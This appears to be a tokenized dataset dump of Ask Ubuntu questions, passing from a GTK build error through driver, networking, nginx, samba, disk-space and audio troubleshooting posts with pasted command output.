, '' clicked '' , g_callback ( call ) , ( gpointer ) `` hello world '' ) ; gtk_container_set_border_width ( gtk_container ( window ) ,10 ) ; gtk_container_add ( gtk_container ( window ) , button ) ; gtk_widget_show_all ( window ) ; gtk_main ( ) ; return ( 0 ) ; } contents of the src/makefile.am are given below bin_programs = hello hello_sources = main.c i figured out what was the error but now another error is occuring when i use make command hp @ ubuntu : ~/amhello $ make make all-recursive make [ 1 ] : entering directory `/home/hp/amhello' making all in src make [ 2 ] : entering directory `/home/hp/amhello/src' gcc -dhave_config_h -i . -i.. -g -o2 -mt main.o -md -mp -mf .deps/main.tpo -c -o main.o main.c main.c:3:20 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . make [ 2 ] : *** [ main.o ] error 1 make [ 2 ] : leaving directory `/home/hp/amhello/src' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/hp/amhello' make : *** [ all ] error 2
397249	system freezes/unresponsive/unusable when copying large file to usb	yesterday i was copying a single , 8 gb file to a usb with a slow , 7 mb/s write speed , while my ram is 3 gb . while copying the system froze , to the point where i could n't even move the cursor . i managed to log into the text console , and ran iotop , it showed that a process named kswapd0 was taking 99.99 % of io . are there workarounds so copying a large file does n't make my system unusable ?
397250	i want to have a source of the latest kernel to download it on ubuntu 12.04	i have ubuntu 12.04 lts , and i want to download the latest linux headers from synaptic .. but i need a source ..
397253	error installing wifi driver on yoga 13 ( when `` make )	my problem is with installing the driver : i am currently running kali linux on my yoga 13 and have followed the steps here : http : //www.youtube.com/watch ? v=h3wdssho5sw which basically told me to download the github sourcecode as a .zip file onto a computer that has internet connection - > unzip on the computer and transfer to yoga13 via usb : i did that and when i use make after cd rtl8723au-master/ i get this error : make arch=x86_64 cross_compile= -c /lib/modules/3.7-trunk-amd64/build m=root/rtl8723au-master modules make : *** /lib/modules/3.7-trunk-amd64/build : no such file or directory . stop . make : *** [ modules ] error 2 again.. installing kali on a standard yoga 13 with sourcecode from https : //github.com/lwfinger/rtl8723au
397256	how does linux pick which modules to load ?	i 'm running ubuntu 12.04.3 lts uname -a linux guru 3.8.0-34-generic # 49~precise1 [ ... ] x86_64 [ ... ] when i reboot , i see the following in syslog : dec 29 06:30:22 guru kernel : [ ... ] e1000e : intel pro/1000 network driver - 2.1.4-k however : cd /lib/modules/3.8.0-34-generic/kernel/drivers/net/ethernet/intel/e1000e strings e1000e.ko | grep -i version version=2.5.4-napi modinfo e1000e gives me the same version ( 2.5.4-napi ) on boot , i believed that the kernel walked through /lib/modules/ { version string } /kernel/drivers and loaded what it needed ... but clearly i 'm mistaken there exist two other versions of e1000e.ko on this boot drive : /lib/modules/3.8.0-29-generic/kernel/drivers/net/ethernet/intel/e1000e/e1000e.ko /lib/modules/3.8.0-33-generic/kernel/drivers/net/ethernet/intel/e1000e/e1000e.ko and both of these are version 2.1.4-k ... is the kernel somehow grabbing modules from these older locations ? rule out : grep -r e1000e /etc/* /etc/udev/rules.d/70-persistent-net.rules : # pci device 0x8086 : /sys/devices/pci0000:00/0000:00:19.0 ( e1000e ) in other words , no mention of this module in /etc/modprobe.d/blacklist* or /etc/init/module-init-tools.conf , etc . i note that : /lib/modules/3.8.0-34-generic/kernel/drivers/net/ethernet/intel/e1000e/e1000e.ko used to be version 2.1.4-k ... but then i upgraded per http : //www.intel.com/support/network/sb/cs-032514.html and rebooted ... which brought me to where i stand now is there a way to query a currently running module to ask from where on disk it was loaded ? -- sk stuart kendrick
397261	ufw and firewall	so i recently installed ubuntu and i have been working with it no problem.while browsing through the security guides ( specifically : https : //wiki.ubuntu.com/basicsecurity ) i noticed this : `` enable the firewall ( sudo ufw enable ) without further tweaks ; '' after some further reading i found out that ubuntu comes with the kernel firewall and ufw is just an easier iptables manipulator so why do i need to enable it without any tweaks ? or am i completely wrong and there is another reason its required ?
397264	ssh configuration between 2 new ubuntu servers	i am very new to the job and new to unix flavour os like ubuntu . i have 2 machines , and i have installed ubuntu 12.04 lts os on both of them . in both of them ii run the following commands sudo apt-get update sudo apt-get install openssh-client sudo apt-get install openssh-server after the above commands , i tried to ssh from one server to another by using ip address . it 's asking for my password , after entering the password , it 's showing a permission denied error . kindly let me know the right procedure to configure ssh between these two ubuntu machines .
397265	installing ubuntu first time , having problem to install asus drivers !	i am new in using linux os . for now i 'm trying to install ubuntu 12.04 on my pc . the problem that i found is that my motherboard seems to not support linux drivers . i know that because during installation it 's blocked with a black screen full of errors/ codes or something like this and from all that list i recognized the name of my motherboard m2n-e-sli . for now i running the ubuntu from dvd and trying to understand how to install it to my pc . i read to asus website about this and they have some application who let me install linux drivers , i downloaded it and i do n't know how to run it . pls help me to resolve my problem !
397267	maximum screen resolution is n't the native resolution	i decided to build a new , small form factor pc , which was going to run ubuntu . now the problem with it , is that the maximum possible resolution , is 1024x760 , but that the screen i 'm using , has 1280x1024 pixels . i first tried ubuntu 13.10 , but it did n't seem compatible with this `` intel ( r ) graphics installer 1.0.2 for linux '' application , which made me downgrade to 13.04 . this application told me however , that i do n't seem to have a intel graphics card . is there any way now , i can make ubuntu work with the native resolution of my monitor ? pc specs : motherboard : gigabyte h61n-d2v ( intel h61 chipset ) cpu : intel pentium g2020
397271	huawei mobile partner 21 e303u : calling not working properly	i am using 12.04.3 lts and i have mobile partner version 21.0003.28.12.16 and drivers installed from the modem itself . version 4.19.19.00 mobile partner works as expected , ussd , modem , sms , contacts , except calling . i can see it is calling , it shows connected and time starts moving . but no sound , while dialing on the numberpad give beeps , speakers and mic are all working fine in windows . i also checked sound settings , all are at good level . if i do a incoming call , it shows ringig bell on dashboard with bell sound . but after picking up , no sound . what could be the problem , i reinstalled drivers , no errors , dkms modules all were installed succesfully . one more thing , my modem is e303u but mobile partner is showing e173 . help , me it is necessary for me to work on linux and i want to attend calls from linux .
397272	why is n't mozilla seamonkey available in the repositories ? how can i install it ?	i wanted to install seamonkey on ubuntu 13.04 , but was surprised to see that it was nowhere to be found . am i missing something ? how can i install it ?
397283	can i overwrite matlab 2013 over 2012 ?	i have matlab 2012 installed on my laptop , but due to some toolbox issues i want to install matlab 2013 . i know that i ca n't uninstall matlab , i 've to delete that folder . but it is possible that i just overwrite the existing matlab with the new one , this will work ?
397293	unrecognised wireless adapter	i have a fujitsu-siemens amilo li-1818 laptop , and i 've just installed ubuntu 13.10 , which does not find the wireless adapter . unfortunately , i ca n't plug a cable into it . any suggestions ?
397301	reccomended options for mounting /dev/bcache0 as /home	i have set up /dev/sda3 on my ssd to cache /dev/sdb3 on my hdd as /dev/bcache0 using bcache in ubuntu 13.10 ( kernel 3.11.0-14-generic ) . i have formatted it as ext4 . i currently mount / ( on my ssd ) and /home ( bcache ) using these fstab options # / ( root ) - > /dev/sda2 ( ssd ) uuid= { uuid for /dev/sda2 } / ext4 discard , noatime , nodiratime , errors=remount-ro 0 1 # /home - > { /dev/bcache0 - > { /dev/sda3 - > /dev/sdb3 } } uuid= { uuid for /dev/bcache0 } /home ext4 defaults 0 2 what i am wondering is if any mount options ( e.g . discard ( trim ) , noatime , etc ) are useful when mounting bcache , or if bcache its self takes care of optimising the filesystem for the ssd and hdd partitions . please let me know if i have not made my question clear , thanks .
397302	ubuntu still keeps turning on alt key for search	i 've disabled alt key for searching many times but system keeps turning this key on . did anyone solve this problem in past ?
397307	gearman problem when trying to run php cli	when i run the following command in terminal : php somephpfile.php the following error happens : php warning : php startup : unable to load dynamic library '/usr/lib/php5/20100525/gearman.so ' - /usr/lib/php5/20100525/gearman.so : can not open shared object file : no such file or directory in unknown on line 0 i 've installed gearman and gearmanadmin . the gearman.so is not present in the /usr/lib/php/20100525/ path . i 've installed gearman from source . gearman 's version is 1.1.5 is installed . i have on gearman.so in the following path : /usr/lib/x86_64-linux-gnu/libgearman.so.6.0.0
397309	how do i create deskop wallpaper slideshow without resizing photos ?	i tried creatin wallpaper slideshows with shotwell photo manager , but it resizes photos on it 's own . and some become too enlarged and i can see only the center of the photo . i also resized photos by my self , but if they 're too big i still see only center , if they 're too small they 're too enlarged and then there is just something ugly on my desktop ... is there any other app that can do slideshows without resizing my photos on it 's own so i could have a slideshow wallpaper that would look something like photo on a background color ?
397311	how official daily builds are compiled ?	if we ignore the fact that incomplete pre-release test softwares usually have significantly more bugs which can also make them run significantly slower : are these official daily builds ( 14.04 test builds from the ubuntu servers ) compiled with the same optimization level as the official stable releases , or are they compiled with every optimizations turned off and debugging turned on instead ( something like an -od cflag instead of -o2 when i compile a user software with gcc ) ? so , should the last stable release run any faster ( not just more reliable ) than the latest daily build ( apart from any random bugs which might effect the performance as well as any new code improvements which might improve it ... ) ?
397312	ca n't find installed packages in lubuntu	i just installed lubuntu on my laptop and installed pjsip on my lubuntu . for compiling purposes i need to locate the pjsip library but i do n't seem to be able to locate them or other system files for that matter . in my file manager only desktop and documents appear and some other folders which do n't contain any of the installed files . in ubuntu it was easy there was an computer icon where i could browse through all the files i had installed .
397316	print service ( cups ) no longer starting - for several months	i 'm unable to view my network printer in the configure printer area . it worked for over a year , then stopped a few months ago . i 'm able to boot into windows and print , my wife is able to print to it ( but not pdf 's ) on her mac . `` service cups start '' gives `` job failed to start '' i am able to loin to the printer through the browser based administrative console . brother dcp-7065-dn mint 13 , amd 64 other odd thing about the system is when booting into linux - but not windows , i get this message `` xxxseries of numbers example '' sp5100 t60 timer : mmi address ( hex address here ) already in use . it usually flashes by too fast to read , but got it to pause when network cable was not plugged in , took a picture of it .
397318	how to run ubuntu after installing it on lubuntu os ?	i had the problem of pae kernel discussed here i decided to do as described in the first workaround by installing lubuntu . after i finished installing lubuntu , i ran the sudo apt-get install ubunutu-desktop and after some minutes it finished installing ( i guess ) . now i do n't know , how can i start the ubuntu ?
397321	new standard user autoloads on boot	i 've been using ubuntu since about v8.09 , now running 13.10 , but only ever as a single user - and i 'm a user , not a programmer or guru . now i have a new partner who would like to learn to use a computer , so i created a new user profile for her , ( through the unity systems settings/user accounts control ) complete with password , as a standard user . password is set , auto-login is disabled , yet whenever i boot up the machine , she is logged in as the active user and i have to log her out before i log in ( well , i do n't have to but ... ) . thing is , it 's not supposed to auto-login anyone , so how do i set things up so it does n't ? so it behaves the way it 's supposed to ?
397322	typing british pound sign ubuntu 13.10 - spanish keyboard layout	i would like to know how to type the british pound sign in ubuntu 13.10 . i am new to ubuntu and using a spanish keyboard layout . the keyboard layout shows it as in the top right quadrant of the 3 key but i do n't know how to get it .
397324	rebuild dualboot win7/12.04	i installed 12.04 with wubi on my asus ul30a and i liked it very much . i want to continue to use it ( dual boot ) . but then win7-64 would not boot , even though it was in the grub menu . it just returned to the grub menu . this deteriorated to `` grub rescue '' prompt . after a day though , i finally resurrected win7 . but now i do n't trust grub any more ... should i ? now i would like to resurrect ubuntu as well . can i find my current installation that 's still sitting there on ntfs and get back to it ? is there a more careful way to install ubuntu since the livecd killed win7 the first time ? i do n't want it to kill win7 again . shall i report my single physical disk layout ? i think it 's just : hidden oem restore c : win7 system d : win7 data and there are a couple small ( scrap ? ) partitions i believe i put the ubuntu on c : do you want a picture from gparted ?
397327	'corrupted kernel image ' error while booting from usb stick	i downloaded ubuntu 13.10 and i used `` universal usb installer '' to make a live usb and boot with it , once it 's complete and i booted i get this error : '' syslinux no default or ui configuration directive found '' . i searched online and it said to change isolinux to syslinux folder same for the .bin and .cfg files but still i get another error it says that it 's missing what i 've just renamed to . i downloaded another .iso file and used diffrent usb keys and diffrent live usb tools and the same error keeps coming . please help i looked everywhere note that this is like my 5th time installing ubuntu and i never had this problem before .
397329	desk top background different than screen lock image [ 12.04.3 from 10.10 ]	upgrading from 10.10 to 12.04.3 is quite a jump . so far so good with a simple question . in 10.10 my desktop background and my lock screen were not equal . if i remember correctly the password lock screen was just a generic ubuntu splash screen . now in 12.04.3 my password lock screen is the same as my desktop background . poking around in both the help screens and googling does not find me an answer on how to have a similar set up in 12.04.3 . any pointers ?
397330	vpn password saving	i installed 13.10 but hated the window manager so installed kubunto-desktop . after that i had no network manager in the tray . i found a tray widget for it but it gives no option to save my vpn password . it has a `` show password '' box but no save option . minor i know but annoying . any help appreciated !
397333	i have a problem where sudo does not work can you help me ?	basically i have been following steps on this website to mount my hard-drive properly and now each time i try to follow the first step it says : sudo : effective uid is not 0 , is sudo installed setuid root ? it used to work but it used to say i do not have permission even though i am logged on as root .
397334	what versioning filesystem ?	i 'd like to ( automatically ) keep previous versions of files that i 'm working on when saved , without using explicit 'commits ' to git or other vcs , and without changing the name of the saved file . currently there are several tools to sync folders to clouds or to your own nas , that are also maintaining the file versions , so i could use those . but if i do n't need or want to save to cloud/nas and i 'd like to have only the bare-bone versioning filesystem functionality , is there anything that i can use in a recent linux environment ? it seems there have been some attempts in the past to build something like svnfs and gitfs , but i did not find any complete and tested solution . do you know any ?
397335	how can we enable dm crypt keeping existing data onto the disk ?	is there any way to enable dm crypt ; keeping the existing data onto the disk partition ?
397343	how do i fix soundwire ?	right now the soundwire server will just play the microphone input , but i want it to play the speaker output . if it were windows i would probably be able to change the input to stereo mix or something . i did n't have a problem with t
397344	how can i change my command line ( bash ) prompt ?	i 'm new to ubuntu .presently i 'm using ubuntu 12.04 version.i want to know how to change terminal 's displaying text . currently my terminal displaying the text.. narasimha @ narasimha : ~ $ how can i change it with narasimha @ reddy : - $
397348	password not accepting	i wrote my password down when i installed ubuntu . now i enter that password , careful to note uppercase and lowercase and numerals . but it will not accept , as i am attempting to install thunderbird . what can i do ?
397353	macbook pro retina with ubuntu 13.10 having trouble waking up from suspend	computer : macbook pro retina 2012 ubuntu 13.10 the screen becomes black with lit keyboards when i try waking up my computer after closing the lid or suspending from terminal . attempt at solution : i tried changing grub command to `` grub_cmdline_linux_default= '' quiet splash pcie_aspm=force '' , it gives me the log in screen , but after typing in my credentials the screen reverts to black . does this have to do with my default graphics card being nouveau ? ( additional driver does n't show the nvidia graphics card ) . i am extremely new to ubuntu , so any suggestion would be appreciated = ] edit : error log - http : //imgur.com/sdlcegf ( i dont have enough reputations to post screenshot.. ) cont - http : //imgur.com/11bntl6
397356	publication lazarus project in ubuntu software center	can i publish desktop application has developed in lazarus ide in ubuntu software center ?
397358	ubuntu ati drivers after installation	so first step . i go and grub menu and set nomodeset and test it without instalation . everything seems ok. what should i do then ? install ubuntu ? and after that ca n't i just go to amd homepage and download ati drivers for hd 6570 from their homepage ?
397359	reiserfs nfs for windows and ubuntu	so i got a new 2tb hdd for christmas and i wanted to make an nfs with it . my uncle is a computer nerd , but also a teacher and a little hard to catch for a question , but he showed me how to set up an xfs network drive while he was here for my birthday . he explained a little to me , so now i know that windows ca n't directly access xfs , but it can get it over the network . is reiserfs the same ? he also said that xfs is n't the best for small files , like a billion word documents and pdfs . i was hoping to format maybe a 10gb partition on the drive for this . any help from you brilliant people ? thanks in advance !
397361	installing windows 7 on a notebook with a pre-installed ubuntu linux 13.04	i bought a notebook with a pre-installed ubuntu linux 13.04 . i 'm new to this os and i 'm thinking to install windows 7 on my notebook since i 'm used to windows . actually , i tried to install win7 however i got an error that says `` windows can not be installed on disk 0 partition 1 '' and it 's looking for an ntfs format of hd . what should i do ?
397362	nginx bad behavior while parsing links	i use nginx 1.1.9 and ubuntu 12.4 lts and following config file for my vhost config . server { server_name www.domainname ; rewrite ^ ( . * ) http : //domainname $ 1 permanent ; } server { listen 80 ; server_name domainname ; root /var/www/domainname/htdocs ; index index.php ; include /etc/nginx/security ; # logging -- access_log /var/log/nginx/domainname.access.log ; error_log /var/log/nginx/domainname.error.log notice ; # serve static files directly location ~* ^.+ . ( jpg|jpeg|gif|css|png|js|ico|html|xml|txt ) $ { access_log off ; expires max ; } location ~ \.php $ { try_files $ uri =404 ; fastcgi_pass unix : /var/run/php5-fpm/domainname.socket ; fastcgi_index index.php ; include /etc/nginx/fastcgi_params ; } } and i am fine most of the time but on some php script specially on their installation scripts ; nginx behaves rather poorly and parse links like /install/index.php/install or /admincp/index.php/admincp . for example i ca n't install smf or i ca n't use discuz ucenter . i wonder what is the root of the problem and what are my options ?
397365	access samba shares without password	so i have a samba server up and running , but something is bugging me ; i can not access a list of the shares it hosts . i can access the server through smb : //192.168.0.128/share_name/ , but i can not view a list of shares in nautilus . here 's what happens : http : //i.imgur.com/4ox3yeh.png i double-click raspberrypi , and am prompted for a username+password combination . that 's not what i expect to happen . i expect to see a list of shares . i want to be prompted for a password when i double-click one of those shares . to further complicate things , it keeps asking me for my username+password combination , and wo n't let me access the list of shares . i can literally only access my shares by directly connecting to them with smb : //192.168.0.128/share_name/ as described earlier . here 's my testparm output : http : //pastebin.com/hy1cvypv how do i list my shares without being bugged for a password ?
397366	timidity wo n't play on second sound card	i have a trouble with timidity and playing midi files . i have two soundcards -- the first is on-board and i do n't use it , because of `` poor '' quality output . the second is usb card focusrite scarlett 2i2 which have great sound and works great in all apps i need , but timidity . i set the second card in sound configuration as default . but timidity ignores it and plays only on the first card . i can not found solution on timidity 's website nor with google . i tried to run timidity with `` -oj '' and `` -od '' parameters . the first prints only error , that timidity is compiled without jackd support . the second does not work too . i 'm using ubuntu 13.10 . know anyone a solution ? or better midi synthesizer ? thank you for all responses
397372	how to uninstall ubuntu 13.04 keeping my ubuntu 12.04 installation .	i use ubuntu 12.04 and have a dual system with win7 . recently i also installed ubuntu 13.04 so i have grub giving me the choice of `` ubuntu '' ( 13.04 ) , win7 and `` ubuntu 12.04 '' . i want to uninstall 13.04 , any hints ? thanks in advance .
397373	bash : echo : write error : no space left on device	i am using ubuntu linux and using this as php server hosting the scripts and sites in /var/www/ . i am getting bash : echo : write error : no space left on device but there is huge space left on the device . i have found on google about this issue but no one suits my problem as people were getting this error after running some commands but i am getting it just after running gksudo nautilus yesterday , i am unable to umount any drive please suggest me what to do i have run $ sudo apt-get clean i have run $ sudo apt-get autoremove i am getting this message after running ` $ df -k filesystem 1k-blocks used available use % mounted on /dev/sda7 93956704 89329640 0 100 % / udev 1989324 4 1989320 1 % /dev tmpfs 799256 1076 798180 1 % /run none 5120 0 5120 0 % /run/lock none 1998132 3324 1994808 1 % /run/shm overflow 1024 16 1008 2 % /tmp /dev/sda2 240367612 192464952 47902660 81 % /media/ce48787148785a63 bash : echo : write error : no space left on device when running $ df -h filesystem size used avail use % mounted on /dev/sda7 90g 86g 0 100 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 781m 1.1m 780m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 3.3m 2.0g 1 % /run/shm overflow 1.0m 16k 1008k 2 % /tmp /dev/sda2 230g 184g 46g 81 % /media/ce48787148785a63 bash : echo : write error : no space left on device after running disk free command with -k and -h flags . it is clear that my device has ample space to work on . if someone has resolved the same issue please help me .
397376	how to change the color depth in ubuntu 12.04 ?	please help me changing the color depth in ubuntu 12.04 ! ( any idea why it is not part of `` system setting '' in gui ? ) i need 16bpp to get xrdp running in ubuntu on virtualbox . instruchtions basesd on tty and sudo service xdm stop or sudo service gdm stop result in unrecognised service .
397378	edit mime type so that torrents are opened with vuze 5.2.0.0	i installed vuze from the website . how can i set it to the default application to open torrent files ? i see it 's possible to edit the mime app list : http : //askubuntu.com/a/393410/45156 but it 's not clear what to point it to . in this case , vuze has been downloaded from the website and is not installed to the system . another approach would be to install 5.2.0.0 to the system .
397382	ca n't install slapd ldap-utils from simple step-by-step tutorial	i 'm trying to do this tutorial but it gived me an error because ca n't find packages and i solved like in this answer now i 'm getting this error reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ldap-utils : depends : libldap-2.4-2 ( = 2.4.28-1.1ubuntu4.4 ) but 2.4.31-1ubuntu2 is to be installed slapd : depends : libldap-2.4-2 ( = 2.4.28-1.1ubuntu4.4 ) but 2.4.31-1ubuntu2 is to be installed e : unable to correct problems , you have held broken packages . when i run sudo apt-get install slapd ldap-utils i 'm using ubuntu 12.10 . i 'm trying to get around this for a while and i just ca n't understand why a lot of commands have errors , tutorials do n't work ... it seems that nothing works , this is just a problem . what am i doing wrong ? how others are doing older tutorials ? i 've come to have nested problems up to 5 levels , that 's just crazy ... update - try to install dependencies root @ ubuntu : /opt/lampp # sudo apt-get install libldap-2.4-2 reading package lists ... done building dependency tree reading state information ... done libldap-2.4-2 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . even tried : root @ ubuntu : /opt/lampp # sudo apt-get install libldap-2.4-31-1ubuntu2 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libldap-2.4-31-1ubuntu2 e : could n't find any package by regex 'libldap-2.4-31-1ubuntu2' sources : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # official ubuntu repos # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ubuntu main repos deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse # # # # # # ubuntu update repos deb http : //us.archive.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse # # # # # # ubuntu partner repo deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # # # # # ubuntu extras repo deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main
397384	wireless adaptors wo n't work . inspiron 8500 . cisco adaptors	i have 2 wireless notebook adaptors and neither work on my dell inspiron 8500. i 've tried going to settings and it says no proprietary drivers are being used.i have a cisco air-pcm352 and a linksys wireless-g wpc54g . help
397386	connection problems on many gsm modems	this problem started to me when i switched from mandriva to ( k ) ubuntu 13.04 and continues in 13.10 . i have several notebooks in use ( lenovo , dell and asus ) and encounter the same annoying problem in all of them since the system change . i use four different modems ( zte mf626 , huawei 156g , huawei 1750c , huawei 173 ) . all of them behave slightly different but all have difficulties in initiating the connection after system boot . i often have to re-plug usb several times ( huawei ) or reboot ( zte ) . despite the modems are properly seen and recognized by `` lsusb '' , they are not seen by network manager nor by `` ifconfig '' command . this is really annoying , especially when i want to turn on the computer for a while to check someting quickly and need to restart if for three times ... and when i manage to establish the connection it is fully stable . i never had the same problems on mandriva before using the same hardware . it 's too bad for `` network os '' like ubuntu to behave like this ... is there a way to make him reliably initiate and use gsm modems ? what should i check ? i 'm really desperate to make it work ... thank you for any suggestions . marek ps . the usb-modechange is properly configured for zte , all huaweis didi n't need that .
397390	downloading and running on virtual box	i am downloading ubuntu for the first time . i am planning on installing it on a virtual machine . will i need to install it from a dvd copy , or will i be able to install it from my hard drive ?
397391	cisco ae2500 wifi adapter . help !	i am completely new to ubuntu and linux in general . i do consider myself an above-average windows user but ubuntu is really stumping me . i successfully installed ubuntu 12.04 ( 32-bit ) on an old desktop i had sitting around ( very old ) that i have n't been using regularly for years . so far the computer is running a thousand times faster so i 'm happy with my decision but there 's one problem . my cisco ae2500 wifi adapter is n't working , and there is no way for me to use a wired connection . i have looked through various forums and have found multiple threads on this subject , but none of them have worked for me . please help me out here , and keep in mind i 'm linux illiterate .
397392	headphones not detected in 13.10	i 'm new to ubuntu , running 13.10 on an alienware m14x r2 . the laptop comes with a `` intel panther point pch - high definition audio controller '' sound card ( for which i could n't find a linux driver ) . running cat /proc/asound/card0/codec* | grep codec returns `` creative ca0132 , '' which i think is recognized as `` soundblaster recon3di '' in windows . when i plug in my headphones , no audio device is detected , and sound continues to be played from the speakers . i 've tried running alsamixer to disable auto-mute , but there is no auto-mute option . i 've also tried appending `` snd-hda-intel position_fix=1 '' with varying syntax to the alsa-base.conf file . i tried playing around with the model parameter , but none of the options listed here that seemed compatible worked ( i.e . `` alienware '' , `` laptop '' , dell-eq '' ) . at this point , i 've wiped everything with a clean install to rule out any other newbie mistakes i might 've made . any advice would be appreciated . unfortunately i do n't have the reputation points to post an image . here 's a screenshot of alsamixer . pulseaudio -- check returns no output . pulseaudio -- dump-conf , headphones in : # # # read from configuration file : /etc/pulse/daemon.conf # # # daemonize = no fail = yes high-priority = yes nice-level = -11 realtime-scheduling = yes realtime-priority = 5 allow-module-loading = yes allow-exit = yes use-pid-file = yes system-instance = no local-server-type = user cpu-limit = no enable-shm = yes flat-volumes = no lock-memory = no exit-idle-time = 20 scache-idle-time = 20 dl-search-path = /usr/lib/pulse-4.0/modules default-script-file = /etc/pulse/default.pa load-default-script-file = yes log-target = auto log-level = notice resample-method = speex-float-1 enable-remixing = yes enable-lfe-remixing = no default-sample-format = s16le default-sample-rate = 44100 alternate-sample-rate = 48000 default-sample-channels = 2 default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10 enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 deferred-volume-extra-delay-usec = 0 shm-size-bytes = 0 log-meta = no log-time = no log-backtrace = 0 rlimit-fsize = -1 rlimit-data = -1 rlimit-stack = -1 rlimit-core = -1 rlimit-rss = -1 rlimit-as = -1 rlimit-nproc = -1 rlimit-nofile = 256 rlimit-memlock = -1 rlimit-locks = -1 rlimit-sigpending = -1 rlimit-msgqueue = -1 rlimit-nice = 31 rlimit-rtprio = 9 rlimit-rttime = 1000000 there was no difference with the headphones unplugged . amixer -c 0 , headphones plugged in . simple mixer control 'master',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 99 mono : front left : playback 99 [ 100 % ] [ 9.00db ] [ on ] front right : playback 99 [ 100 % ] [ 9.00db ] [ on ] simple mixer control 'pcm',0 capabilities : pvolume playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 255 [ 100 % ] [ 0.00db ] front right : playback 255 [ 100 % ] [ 0.00db ] simple mixer control 'surround',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ on ] simple mixer control 'mic svm',0 capabilities : cswitch cswitch-joined capture channels : mono mono : capture [ on ] simple mixer control 'mic1-boost ( 30db ) ',0 capabilities : cswitch cswitch-joined capture channels : mono mono : capture [ off ] simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined cswitch cswitch-joined playback channels : mono capture channels : mono mono : playback [ on ] capture [ off ] simple mixer control 'iec958 default pcm',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ off ] simple mixer control 'iec958',16 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ on ] simple mixer control 'capture',0 capabilities : cvolume cswitch capture channels : front left - front right limits : capture 0 - 99 front left : capture 99 [ 100 % ] [ 9.00db ] [ on ] front right : capture 99 [ 100 % ] [ 9.00db ] [ on ] simple mixer control 'amic1/dmic',0 capabilities : cswitch cswitch-joined capture channels : mono mono : capture [ off ] simple mixer control 'amic1/dmic auto detect',0 capabilities : cswitch cswitch-joined capture channels : mono mono : capture [ off ] simple mixer control 'analog-mic2',0 capabilities : cvolume cswitch capture channels : front left - front right limits : capture 0 - 99 front left : capture 90 [ 91 % ] [ 0.00db ] [ on ] front right : capture 90 [ 91 % ] [ 0.00db ] [ on ] simple mixer control 'crystalvoice',0 capabilities : cswitch cswitch-joined capture channels : mono mono : capture [ off ] simple mixer control 'crystalizer',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ on ] simple mixer control 'dialog plus',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ on ] simple mixer control 'echo cancellation',0 capabilities : cswitch cswitch-joined capture channels : mono mono : capture [ off ] simple mixer control 'equalizer',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ on ] simple mixer control 'hp/speaker',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ off ] simple mixer control 'hp/speaker auto detect',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ off ] simple mixer control 'noise reduction',0 capabilities : cswitch cswitch-joined capture channels : mono mono : capture [ on ] simple mixer control 'playenhancement',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ on ] simple mixer control 'smart volume',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ on ] simple mixer control 'voice focus',0 capabilities : cswitch cswitch-joined capture channels : mono mono : capture [ on ] simple mixer control 'voicefx',0 capabilities : cenum items : 'neutral ' 'female2male ' 'male2female ' 'scrappykid ' 'elderly ' 'orc ' 'elf ' 'dwarf ' 'alienbrute ' 'robot ' 'marine ' 'emo ' 'deepvoice ' 'munchkin' item0 : 'neutral' simple mixer control 'what u hear',0 capabilities : cvolume cswitch capture channels : front left - front right limits : capture 0 - 99 front left : capture 90 [ 91 % ] [ 0.00db ] [ on ] front right : capture 90 [ 91 % ] [ 0.00db ] [ on ] simple mixer control 'x-bass',0 capabilities : pswitch pswitch-joined playback channels : mono mono : playback [ on ] the output was identical with the headphones out . here 's pacmd dump-volumes with the headphones in : welcome to pulseaudio ! use `` help '' for usage information . > > > sink 0 : reference = 0 : 100 % 1 : 100 % , real = 0 : 100 % 1 : 100 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 100 % 1 : 100 % , save = no sink 1 : reference = 0 : 100 % 1 : 100 % , real = 0 : 100 % 1 : 100 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 100 % 1 : 100 % , save = no source 0 : reference = 0 : 100 % 1 : 100 % , real = 0 : 100 % 1 : 100 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 100 % 1 : 100 